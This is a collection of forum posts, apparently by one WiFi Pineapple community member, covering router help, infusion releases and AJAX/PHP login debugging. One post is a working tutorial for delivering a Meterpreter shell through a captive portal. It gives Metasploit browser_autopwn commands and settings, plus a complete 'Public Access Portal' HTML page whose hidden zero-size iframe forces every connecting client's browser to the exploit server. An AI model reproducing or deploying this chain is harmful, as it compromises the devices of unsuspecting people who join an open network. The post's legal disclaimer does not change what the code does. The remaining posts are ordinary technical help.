newbi3

You need to change the port of one of the servers, you cannot have them booth running on port 22 and port-forward both of them.

You can never go wrong with lenovo for anything that will be running linux. I have a thinkpad T410 and I am very happy with it

Just a quick bug to report. In version 1.1 the startup button the small tile does nothing, I copied and pasted the code I wrote from the large tile and forgot the important parts of it. This will be fixed in version 1.2 which will be available shortly :) The update also includes a stop and disable button requested by skysploit. Please PM or post any more suggestions you may have! Version 1.2 is now available for download so please update. The start button on the small tile has been fixed along with a stop and disable button added to the small tile and large tile. Enjoy!

I haven't researched it to much yet but I am pretty sure the nodogsplash web server doesn't support PHP so you will only be writting HTML, CSS, and javascript.

Very simple, you can either put them in /etc/nodogsplash/images/ or in /www and reference it like <img src="172.16.42.1:8080/mylogo.png"/>

Plug it into the PoE port and you should be good.

Running a captive portal is a very useful thing on the pineapple and since everyone has to view it I thought why not use it to run an attack and get a shell? So here is a quick tutorial on using evil portal to deliver a meterpreter shell. You will need a pineapple running v3.x of the firmware with evil portal installed on it as well as metasploit and a machine to test this on. Before we get started here I'd like to remind you to check the laws where you live this could be illegal and also I am not responsible for your actions you and only you are. Please only do this in an environment that you have permission to do so in! Ok so first this is first lets start up metasploit and use browser autopwn by running the following commands: root@box:~# msfconsole msf > use auxiliary/server/browser_autopwn Now that that is done lets go ahead and take a look at the options msf auxiliary(browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) We need to set LHOST and SRVHOST to the address of our machine ON THE PINEAPPLE NETWORK. In my case it is 172.16.42.42 and if you ran the wp4.sh script yours should be too. Also just for less confusion set SRVPORT to 80 and URIPATH to / msf auxiliary(browser_autopwn) > set LHOST 172.16.42.1 LHOST => 172.16.42.1 msf auxiliary(browser_autopwn) > set SRVPORT 172.16.42.1 SRVPORT => 172.16.42.1 msf auxiliary(browser_autopwn) > set SRVPORT 80 SRVPORT => 80 msf auxiliary(browser_autopwn) > set URIPATH / URIPATH => / Ok now go ahead and run it with the "run" command. This will take a minute to start up fully. Once that has finished starting up we need to create an iframe to it in our captive portal. Under the "Edit Splash" tab in Evil Portal go ahead and add this line somewhere in the body and then save the file: <iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe> This creates the iframe to the server running browser autopwn which will be doing our dirty work for us. After you saved the changes open up a browser on your test machine (that is connected to the pineapple network) and visit any webpage and you should get stopped by the captive portal! Check over in your metasploit console to see if you got any sessions, I am not going to hold your hand for this part because this is not a tutorial on how to use meterpreter. I hope this works for you and if you do anything cool post it here I'd love to see what the community does! Remember hack responsibly! Here is a quick video I made showing this in action: If you are wanting to use my code for the captive portal here it is: <html> <head> <title>Public Access Portal</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"> <script type="text/javascript"> var delay = 2; // length of delay in seconds var count = 0; var Texts=new Array(); Texts[0]='<p style="font-size:10px;"><u>Terms Of Service</u></p><p style="font-size:10px;">You agree that Public Access is not respondsible for your actions on the internet or on this network.<br/>You agree that all of your communications will be monitored and recorded by Public Access</p>'; Texts[1]='<a href="$authtarget"><img src="$imagesdir/enter.png" width="71" height="49" border="0"alt="Click to enter" title="Click to enter"> </a>'; function changeText(){ document.getElementById('textRange').innerHTML=Texts[count]; count++; if(count==Texts.length){ window.clearTimeout (to); count=0; } else { var to = setTimeout("changeText()",delay*10000); } } </script> </head> <body bgcolor="#DDDDDD" text="#000000" onload="changeText();"> <table border="0" cellpadding="2" cellspacing="0" width="100%"></applet> <tr> <td align=center> <!--<h2>Public Access</h2> <h10><b><u>Providing fast wireless access to the masses.</u></b></h10>--> </td> </tr> <tr> <td align=center> <br/><br/><br/> <h1>You're almost there!</h1> <p>BY CONNECTING TO THE NETWORK YOU AGREE TO OUR TERMS OF SERVICE.</p> </td> </tr> <tr> <td align=center height="120"> <!-- A client is authenticated by requesting the page $authtarget. So, href to it here, with an img or link text the user can click on. Also, note that any images you reference must reside in the subdirectory that is the value of $imagesdir (default: "images"). --> <div id="textRange"></div> </td> </tr> </table> <iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe> </body> </html>

Ouch. Check for SQL Injection and XXS points in your site and patch them otherwise the attacker will be right back in. Also check your backups and make sure they are not compromised.

Fixed in version 1.1 should be available to update shortly available now, please update :)

Thanks :D Please post any bugs or suggestions you have here and I will get them fixed as soon as I can!

run dmesg and post the output here, there isn't enough info to debug the problem in your post.

when you run ifconfig do you have any interfaces up other than lo? And also check /etc/network/interfaces and post the contents of the file on here so I can help you more.

Evil Portal is a UI front end for nodogsplash on the 3.x.x firmware. It makes it really simple to create a captive portal for whatever your needs are. You can do anything with it from just making someone agree to your terms of use on the pineapple to running some sort of browser exploitation that your clients are forced to visit (remember the laws where you live). Here's some media: This video goes along with a tutorial I made: click here

How does it communicate with the pineapple?

Solved the problem was in the javascript here is the updated code for anyone else who has this problem: function attemptLogin() { var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("results").innerHTML=xmlhttp.responseText; } } var usernamevalue=encodeURIComponent(document.getElementById("username").value) var passwordvalue=encodeURIComponent(document.getElementById("password").value) var parameters="username="+usernamevalue+"&password="+passwordvalue xmlhttp.open("POST", "actions.php?login", true) xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded") xmlhttp.send(parameters) }

It a wireless access point running openWRT with some custom software. As to what you can do with it; you can do anything you want! I use mine just as a fun development tool for strange ideas that occur to me like making it be controlled over MMS through text messages from your phone. Some other people use it as a pentesting tool, others might use it as a good tool for learning linux, and I wouldnt be surprised if some people used it as a home access point for some reason. The 3g or 4g dongles are completely optional you could tether it through a phone or a laptop if you wanted to.

Thanks but my problem was it was submitting and refreshing so I never saw the text displayed a simple return false; did the trick! My new problem is that the values in the input fields don't seem to be being submitted. Heres my updated code: html: <div id="results"></div> <form id="login" action="actions.php?login" method="POST" onsubmit="attemptLogin(); return false;"> <table cellspacing="10px";> <tr> <td><label>Username</label></td> <td><input type="text" name="username" id="username"></td> </tr> <tr> <td><label>Password</label></td> <td><input type="password" name="password"></td> </tr> <tr> <td><button type="button" onclick="attemptLogin()">Try the thing</button> <td><input type="submit" value="LOGIN"></td> </tr> </table> </form> javascript: function attemptLogin() { var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("results").innerHTML=xmlhttp.responseText; } } xmlhttp.open("POST","actions.php?login",true); xmlhttp.send(); } php: <?php if (isset($_GET['login'])) { if (isset($_POST['username']) || isset($_GET['username']) || isset($_REQUEST['username'])) echo 'hello ' . $_POST['username']; else echo "username was not set."; } ?>

I am working on a login form. The HTML form and the PHP is good but the ajax doesnt return anything... Why the hell wont my stuff work? Here is my html: <div id="results"></div> <form id="login" action="" method="POST" onSubmit="attemptLogin()"> <table cellspacing="10px";> <tr> <td><label>Username</label></td> <td><input type="text" name="username"></td> </tr> <tr> <td><label>Password</label></td> <td><input type="password" name="password"></td> </tr> <tr> <td><input type="submit" value="LOGIN"></td> </tr> </table> </form> Javascript: function attemptLogin() { var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("results").innerHTML=xmlhttp.responseText; } } xmlhttp.open("POST","actions.php?login",true); xmlhttp.send(); } and my PHP (in a file called actions.php): <?php if (isset($_GET['login'])) { echo 'Hello ' . $_POST['username']; } ?>

I am glad to hear someone is using it!

Are you making a front end infusion for this? (Looking at the bottom right corner)

Theres your problem. As Darren said "you are holding it wrong" please download chrome or firefox and never use IE again lol

looking forward to it!

Thanks guys :D this is bar far the simplest infusion in the pineapple bar!

My second infusion, black out, has been released. It gives you the ability to graphically turn on and off all of the LEDs on the pineapple (besides the power indicator) or individual ones. It is available for 3.x.x and is in the pineapple bar now!

Try this test again away from your home network. There could be many reasons why you connected to your home network first such as, it could have been closer or, your mac book prefers to connect to protected networks over un protected ones so it chose your home network instead. There are more reasons it could have done that but like I said try it again away from your home network and see what happens or try to deauth a test machine from your home network and see if it will connect to the pineapple.